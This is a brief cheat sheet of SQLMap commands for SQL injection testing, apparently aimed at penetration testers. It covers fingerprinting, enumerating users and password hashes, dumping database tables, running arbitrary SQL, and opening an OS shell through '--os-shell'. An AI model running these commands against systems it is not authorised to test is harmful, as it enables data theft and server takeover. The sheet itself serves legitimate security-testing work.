Skip to content

SQLMap commandsΒΆ

Test URL and POST data and return database banner (if possible)

./ --url="<url>" --data="<post-data>" --banner

Test Multiple URLs with default values and extract database names, saving results

./ -m urls.txt --batch --dbs --output-dir=result

Parse request data and test (request data can be obtained with Burp)

./ -r <request-file> <options>

Fingerprint (provides more information than banner)

./ -r <request-file> --fingerprint

Get database username, name, and hostname

./ -r <request-file> --current-user --current-db --hostname

Check if user is a database admin

./ -r <request-file> --is-dba

Get database users and password hashes

./ -r <request-file> --users --passwords

Enumerate databases

./ -r <request-file> --dbs

List tables for one database

./ -r <request-file> -D <db-name> --tables

Other database commands

./ -r <request-file> -D <db-name> --columns

Enumeration flags

./ -r <request-file> -D <db-name>
                  -T <tbl-name>
                  -C <col-name>
                  -U <user-name>

Extract data

./ -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

Execute SQL Query

./ -r <request-file> --sql-query="<sql-query>"

Append/Prepend SQL Queries

./ -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"

Get backdoor access to SQL server (can provide shell access)

./ -r <request-file> --os-shell